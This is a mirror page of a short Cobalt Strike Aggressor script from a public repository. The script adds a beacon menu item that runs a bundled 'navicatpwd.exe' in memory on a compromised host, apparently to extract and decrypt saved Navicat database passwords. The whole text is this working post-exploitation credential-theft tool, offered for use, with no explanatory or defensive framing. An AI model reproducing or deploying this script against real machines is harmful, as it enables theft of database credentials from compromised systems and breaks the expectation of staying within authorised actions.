mirror of
https://github.com/timwhitez/Cobalt-Strike-Aggressor-Scripts
synced 2026-06-08 17:50:44 +00:00
16 lines
256 B
Plaintext
16 lines
256 B
Plaintext
sub navicat_password{
|
|
|
|
bexecute_assembly($bid, script_resource("modules/navicatpwd.exe"));
|
|
|
|
}
|
|
popup beacon_bottom {
|
|
menu "NaviDecrypt" {
|
|
item "Navicat-Password"{
|
|
$bid = $1['@'];
|
|
navicat_password($bid);
|
|
}
|
|
}
|
|
}
|
|
|
|
|